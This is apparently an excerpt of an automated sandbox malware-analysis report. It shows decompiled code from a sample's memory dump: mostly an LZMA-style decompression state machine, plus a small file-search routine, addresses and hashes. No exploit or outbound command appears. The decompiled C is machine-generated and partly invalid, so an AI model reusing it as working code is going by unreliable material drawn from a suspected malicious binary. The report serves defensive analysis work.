							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                            0x00000000
                            0x00406d5f
                            0x00406d5f
                            0x00406d64
                            0x00406ddb
                            0x00406de2
                            0x00406dec
                            0x004073cb
                            0x004073cb
                            0x004073ce
                            0x004073ce
                            0x004073d4
                            0x004073da
                            0x004073e0
                            0x004073fa
                            0x004073fd
                            0x00407403
                            0x0040740e
                            0x00407410
                            0x004073e2
                            0x004073e2
                            0x004073f1
                            0x004073f5
                            0x004073f5
                            0x0040741a
                            0x00407441
                            0x00407441
                            0x00407447
                            0x00407447
                            0x00000000
                            0x0040741c
                            0x0040741c
                            0x00407420
                            0x004075cf
                            0x00000000
                            0x004075cf
                            0x0040742c
                            0x00407433
                            0x0040743b
                            0x0040743e
                            0x00000000
                            0x0040743e
                            0x00406d66
                            0x00406d66
                            0x00406d6a
                            0x00406d72
                            0x00406d75
                            0x00406d77
                            0x00406d7a
                            0x00406d7c
                            0x00406d81
                            0x00406d84
                            0x00406d8b
                            0x00406d92
                            0x00406d95
                            0x00406da0
                            0x00406da8
                            0x00406da8
                            0x00406da2
                            0x00406da2
                            0x00406da2
                            0x00406d97
                            0x00406d97
                            0x00406d97
                            0x00406daf
                            0x00406dcd
                            0x00406dcf
                            0x00406fa2
                            0x00406fa2
                            0x00406fa5
                            0x00406fa8
                            0x00406fab
                            0x00406fae
                            0x00406fb1
                            0x00406fb4
                            0x00406fb7
                            0x00406fba
                            0x00406fc0
                            0x00406fd8
                            0x00406fdb
                            0x00406fde
                            0x00406fe1
                            0x00406fe1
                            0x00406fe4
                            0x00406fea
                            0x00406fc2
                            0x00406fc2
                            0x00406fca
                            0x00406fcf
                            0x00406fd1
                            0x00406fd3
                            0x00406fd3
                            0x00406ff4
                            0x00406ff7
                            0x00406f9a
                            0x00406fa0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406ff9
                            0x00406f75
                            0x00406f79
                            0x00407581
                            0x00000000
                            0x00407581
                            0x00406f7f
                            0x00406f82
                            0x00406f85
                            0x00406f89
                            0x00406f8c
                            0x00406f92
                            0x00406f94
                            0x00406f94
                            0x00406f97
                            0x00000000
                            0x00406f97
                            0x00406db1
                            0x00406db1
                            0x00406db4
                            0x00406dba
                            0x00406dbc
                            0x00406dbc
                            0x00406dbf
                            0x00406dc2
                            0x00406dc4
                            0x00406dc5
                            0x00406dc8
                            0x00406e35
                            0x00406e35
                            0x00406e39
                            0x00406e3c
                            0x00406e3f
                            0x00406e42
                            0x00406e45
                            0x00406e46
                            0x00406e49
                            0x00406e4b
                            0x00406e51
                            0x00406e54
                            0x00406e57
                            0x00406e5a
                            0x00406e5d
                            0x00406e63
                            0x00406e7f
                            0x00406e82
                            0x00406e85
                            0x00406e88
                            0x00406e8f
                            0x00406e95
                            0x00406e99
                            0x00406e65
                            0x00406e65
                            0x00406e69
                            0x00406e71
                            0x00406e76
                            0x00406e78
                            0x00406e7a
                            0x00406e7a
                            0x00406ea3
                            0x00406ea6
                            0x00406e1d
                            0x00406e1d
                            0x00406e23
                            0x00406ed6
                            0x00406edc
                            0x00000000
                            0x00000000
                            0x00406ede
                            0x00406ee1
                            0x00406ee4
                            0x00406ee7
                            0x00406eea
                            0x00406eed
                            0x00406ef0
                            0x00406ef3
                            0x00406ef6
                            0x00406efc
                            0x00406f14
                            0x00406f17
                            0x00406f1a
                            0x00406f1d
                            0x00406f1d
                            0x00406f20
                            0x00406f26
                            0x00406efe
                            0x00406efe
                            0x00406f06
                            0x00406f0b
                            0x00406f0d
                            0x00406f0f
                            0x00406f0f
                            0x00406f30
                            0x00406f33
                            0x00406eb1
                            0x00406eb5
                            0x00407575
                            0x00000000
                            0x00407575
                            0x00406ebb
                            0x00406ebe
                            0x00406ec1
                            0x00406ec5
                            0x00406ec8
                            0x00406ece
                            0x00406ed0
                            0x00406ed0
                            0x00406ed3
                            0x00406ed3
                            0x00406f33
                            0x00406f3a
                            0x00406f3a
                            0x00406f3a
                            0x00406f3e
                            0x00406f3e
                            0x00406f41
                            0x00406f44
                            0x00406f48
                            0x0040758d
                            0x00000000
                            0x0040758d
                            0x00406f4e
                            0x00406f51
                            0x00406f54
                            0x00406f57
                            0x00406f5a
                            0x00406f5d
                            0x00406f60
                            0x00406f62
                            0x00406f65
                            0x00406f68
                            0x00406f6b
                            0x00406f6d
                            0x00406f6d
                            0x00406f6d
                            0x0040710a
                            0x0040710a
                            0x0040710d
                            0x0040710d
                            0x00000000
                            0x0040710d
                            0x00406e2f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406eac
                            0x00406df8
                            0x00406dfc
                            0x00407569
                            0x004075e5
                            0x004075ed
                            0x004075f4
                            0x004075f6
                            0x004075fd
                            0x00407601
                            0x00407601
                            0x00406e02
                            0x00406e05
                            0x00406e08
                            0x00406e0c
                            0x00406e0f
                            0x00406e15
                            0x00406e17
                            0x00406e17
                            0x00406e1a
                            0x00000000
                            0x00406e1a
                            0x00406ea6
                            0x00406daf
                            0x00406be3
                            0x00406be3
                            0x00406bec
                            0x004075fa
                            0x004075fa
                            0x00000000
                            0x004075fa
                            0x00406bf2
                            0x00000000
                            0x00406bfd
                            0x00000000
                            0x00000000
                            0x00406c06
                            0x00406c09
                            0x00406c0c
                            0x00406c10
                            0x00000000
                            0x00000000
                            0x00406c16
                            0x00406c19
                            0x00406c1b
                            0x00406c1c
                            0x00406c1f
                            0x00406c21
                            0x00406c22
                            0x00406c24
                            0x00406c27
                            0x00406c2c
                            0x00406c31
                            0x00406c3a
                            0x00406c4d
                            0x00406c50
                            0x00406c5c
                            0x00406c84
                            0x00406c86
                            0x00406c94
                            0x00406c94
                            0x00406c98
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406c88
                            0x00406c88
                            0x00406c8b
                            0x00406c8c
                            0x00406c8c
                            0x00000000
                            0x00406c88
                            0x00406c62
                            0x00406c67
                            0x00406c67
                            0x00406c70
                            0x00406c78
                            0x00406c7b
                            0x00000000
                            0x00406c81
                            0x00406c81
                            0x00000000
                            0x00406c81
                            0x00000000
                            0x00406c9e
                            0x00406c9e
                            0x00406ca2
                            0x0040754e
                            0x00000000
                            0x0040754e
                            0x00406cab
                            0x00406cbb
                            0x00406cbe
                            0x00406cc1
                            0x00406cc1
                            0x00406cc1
                            0x00406cc4
                            0x00406cc8
                            0x00000000
                            0x00000000
                            0x00406cca
                            0x00406cd0
                            0x00406cfa
                            0x00406d00
                            0x00406d07
                            0x00000000
                            0x00406d07
                            0x00406cd6
                            0x00406cd9
                            0x00406cde
                            0x00406cde
                            0x00406ce9
                            0x00406cf1
                            0x00406cf4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406d39
                            0x00406d3f
                            0x00406d42
                            0x00406d4f
                            0x00406d57
                            0x00000000
                            0x00000000
                            0x00406d0e
                            0x00406d0e
                            0x00406d12
                            0x0040755d
                            0x00000000
                            0x0040755d
                            0x00406d1e
                            0x00406d29
                            0x00406d29
                            0x00406d29
                            0x00406d2c
                            0x00406d2f
                            0x00406d32
                            0x00406d37
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406ffe
                            0x00407002
                            0x00407020
                            0x00407023
                            0x0040702a
                            0x0040702d
                            0x00407030
                            0x00407033
                            0x00407036
                            0x00407039
                            0x0040703b
                            0x00407042
                            0x00407043
                            0x00407045
                            0x00407048
                            0x0040704b
                            0x0040704e
                            0x0040704e
                            0x00407053
                            0x00000000
                            0x00407053
                            0x00407004
                            0x00407007
                            0x0040700a
                            0x00407014
                            0x00000000
                            0x00000000
                            0x00407068
                            0x0040706c
                            0x0040708f
                            0x00407092
                            0x00407095
                            0x0040709f
                            0x0040706e
                            0x0040706e
                            0x00407071
                            0x00407074
                            0x00407077
                            0x00407084
                            0x00407087
                            0x00407087
                            0x00000000
                            0x00000000
                            0x004070ab
                            0x004070af
                            0x00000000
                            0x00000000
                            0x004070b5
                            0x004070b9
                            0x00000000
                            0x00000000
                            0x004070bf
                            0x004070c1
                            0x004070c5
                            0x004070c5
                            0x004070c8
                            0x004070cc
                            0x00000000
                            0x00000000
                            0x0040711c
                            0x00407120
                            0x00407127
                            0x0040712a
                            0x0040712d
                            0x00407137
                            0x00000000
                            0x00407137
                            0x00407122
                            0x00000000
                            0x00000000
                            0x00407143
                            0x00407147
                            0x0040714e
                            0x00407151
                            0x00407154
                            0x00407149
                            0x00407149
                            0x00407149
                            0x00407157
                            0x0040715a
                            0x0040715d
                            0x0040715d
                            0x00407160
                            0x00407163
                            0x00407166
                            0x00407166
                            0x00407169
                            0x00407170
                            0x00407175
                            0x00000000
                            0x00000000
                            0x00407203
                            0x00407203
                            0x00407207
                            0x004075a5
                            0x00000000
                            0x004075a5
                            0x0040720d
                            0x00407210
                            0x00407213
                            0x00407217
                            0x0040721a
                            0x00407220
                            0x00407222
                            0x00407222
                            0x00407222
                            0x00407225
                            0x00407228
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00407286
                            0x00407286
                            0x0040728a
                            0x004075b1
                            0x00000000
                            0x004075b1
                            0x00407290
                            0x00407293
                            0x00407296
                            0x0040729a
                            0x0040729d
                            0x004072a3
                            0x004072a5
                            0x004072a5
                            0x004072a5
                            0x004072a8
                            0x00000000
                            0x00000000
                            0x00407056
                            0x00407056
                            0x00407059
                            0x00000000
                            0x00000000
                            0x00407395
                            0x00407399
                            0x004073bb
                            0x004073be
                            0x004073c8
                            0x00000000
                            0x004073c8
                            0x0040739b
                            0x0040739e
                            0x004073a2
                            0x004073a5
                            0x004073a5
                            0x004073a8
                            0x00000000
                            0x00000000
                            0x00407452
                            0x00407456
                            0x00407474
                            0x00407474
                            0x00407474
                            0x0040747b
                            0x00407482
                            0x00407489
                            0x00407489
                            0x00000000
                            0x00407489
                            0x00407458
                            0x0040745b
                            0x0040745e
                            0x00407461
                            0x00407468
                            0x004073ac
                            0x004073ac
                            0x004073af
                            0x00000000
                            0x00000000
                            0x00407543
                            0x00407546
                            0x00000000
                            0x00000000
                            0x0040717d
                            0x0040717f
                            0x00407186
                            0x00407187
                            0x00407189
                            0x0040718c
                            0x00000000
                            0x00000000
                            0x00407194
                            0x00407197
                            0x0040719a
                            0x0040719c
                            0x0040719e
                            0x0040719e
                            0x0040719f
                            0x004071a2
                            0x004071a9
                            0x004071ac
                            0x004071ba
                            0x00000000
                            0x00000000
                            0x00407490
                            0x00407490
                            0x00407493
                            0x0040749a
                            0x00000000
                            0x00000000
                            0x0040749f
                            0x0040749f
                            0x004074a3
                            0x004075db
                            0x00000000
                            0x004075db
                            0x004074a9
                            0x004074ac
                            0x004074af
                            0x004074b3
                            0x004074b6
                            0x004074bc
                            0x004074be
                            0x004074be
                            0x004074be
                            0x004074c1
                            0x004074c4
                            0x004074c4
                            0x004074c4
                            0x004074c4
                            0x004074c7
                            0x004074c7
                            0x004074cb
                            0x0040752b
                            0x0040752e
                            0x00407533
                            0x00407534
                            0x00407536
                            0x00407538
                            0x0040753b
                            0x00000000
                            0x0040753b
                            0x004074cd
                            0x004074d3
                            0x004074d6
                            0x004074d9
                            0x004074dc
                            0x004074df
                            0x004074e2
                            0x004074e5
                            0x004074e8
                            0x004074eb
                            0x004074ee
                            0x00407507
                            0x0040750a
                            0x0040750d
                            0x00407510
                            0x00407514
                            0x00407516
                            0x00407516
                            0x00407517
                            0x0040751a
                            0x004074f0
                            0x004074f0
                            0x004074f8
                            0x004074fd
                            0x004074ff
                            0x00407502
                            0x00407502
                            0x0040751d
                            0x00407524
                            0x00000000
                            0x00407526
                            0x00000000
                            0x00407526
                            0x00000000
                            0x004071c2
                            0x004071c5
                            0x004071fb
                            0x0040732b
                            0x0040732b
                            0x0040732b
                            0x0040732b
                            0x0040732e
                            0x0040732e
                            0x00407331
                            0x00407333
                            0x004075bd
                            0x00000000
                            0x004075bd
                            0x00407339
                            0x0040733c
                            0x00000000
                            0x00000000
                            0x00407342
                            0x00407346
                            0x00407349
                            0x00407349
                            0x00407349
                            0x00000000
                            0x00407349
                            0x004071c7
                            0x004071c9
                            0x004071cb
                            0x004071cd
                            0x004071d0
                            0x004071d1
                            0x004071d3
                            0x004071d5
                            0x004071d8
                            0x004071db
                            0x004071f1
                            0x004071f6
                            0x0040722e
                            0x0040722e
                            0x00407232
                            0x0040725e
                            0x00407260
                            0x00407267
                            0x0040726a
                            0x0040726d
                            0x0040726d
                            0x00407272
                            0x00407272
                            0x00407274
                            0x00407277
                            0x0040727e
                            0x00407281
                            0x004072ae
                            0x004072ae
                            0x004072b1
                            0x004072b4
                            0x00407328
                            0x00407328
                            0x00407328
                            0x00000000
                            0x00407328
                            0x004072b6
                            0x004072bc
                            0x004072bf
                            0x004072c2
                            0x004072c5
                            0x004072c8
                            0x004072cb
                            0x004072ce
                            0x004072d1
                            0x004072d4
                            0x004072d7
                            0x004072f0
                            0x004072f2
                            0x004072f5
                            0x004072f6
                            0x004072f9
                            0x004072fb
                            0x004072fe
                            0x00407300
                            0x00407302
                            0x00407305
                            0x00407307
                            0x0040730a
                            0x0040730e
                            0x00407310
                            0x00407310
                            0x00407311
                            0x00407314
                            0x00407317
                            0x004072d9
                            0x004072d9
                            0x004072e1
                            0x004072e6
                            0x004072e8
                            0x004072eb
                            0x004072eb
                            0x0040731a
                            0x00407321
                            0x004072ab
                            0x004072ab
                            0x004072ab
                            0x004072ab
                            0x00000000
                            0x00407323
                            0x00000000
                            0x00407323
                            0x00407321
                            0x00407234
                            0x00407237
                            0x00407239
                            0x0040723c
                            0x0040723f
                            0x00407242
                            0x00407244
                            0x00407247
                            0x0040724a
                            0x0040724a
                            0x0040724d
                            0x0040724d
                            0x00407250
                            0x00407257
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x00000000
                            0x00407259
                            0x00000000
                            0x00407259
                            0x00407257
                            0x004071dd
                            0x004071e0
                            0x004071e2
                            0x004071e5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004070cf
                            0x004070cf
                            0x004070d3
                            0x00407599
                            0x00000000
                            0x00407599
                            0x004070d9
                            0x004070dc
                            0x004070df
                            0x004070e2
                            0x004070e4
                            0x004070e4
                            0x004070e4
                            0x004070e7
                            0x004070ea
                            0x004070ed
                            0x004070f0
                            0x004070f3
                            0x004070f6
                            0x004070f7
                            0x004070f9
                            0x004070f9
                            0x004070f9
                            0x004070fc
                            0x004070ff
                            0x00407102
                            0x00407105
                            0x00407105
                            0x00407105
                            0x00407108
                            0x00000000
                            0x00000000
                            0x0040734c
                            0x0040734c
                            0x0040734c
                            0x00407350
                            0x00000000
                            0x00000000
                            0x00407356
                            0x00407359
                            0x0040735c
                            0x0040735f
                            0x00407361
                            0x00407361
                            0x00407361
                            0x00407364
                            0x00407367
                            0x0040736a
                            0x0040736d
                            0x00407370
                            0x00407373
                            0x00407374
                            0x00407376
                            0x00407376
                            0x00407376
                            0x00407379
                            0x0040737c
                            0x0040737f
                            0x00407382
                            0x00407385
                            0x00407389
                            0x0040738b
                            0x0040738e
                            0x00000000
                            0x00407390
                            0x00000000
                            0x00407390
                            0x0040738e
                            0x004075c3
                            0x00000000
                            0x00000000
                            0x00406bf2

                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                            • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                            • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                            • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0040699E(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426798); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426798;
			}




                            0x004069a9
                            0x004069b2
                            0x00000000
                            0x004069bf
                            0x004069b5
                            0x00000000

                            APIs
                            • FindFirstFileW.KERNELBASE(766DFAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,766DFAA0,?,766DF560,00405D94,?,766DFAA0,766DF560), ref: 004069A9
                            • FindClose.KERNEL32(00000000), ref: 004069B5
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: Find$CloseFileFirst
                            • String ID:
                            • API String ID: 2295610775-0
                            • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                            • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                            • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                            • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
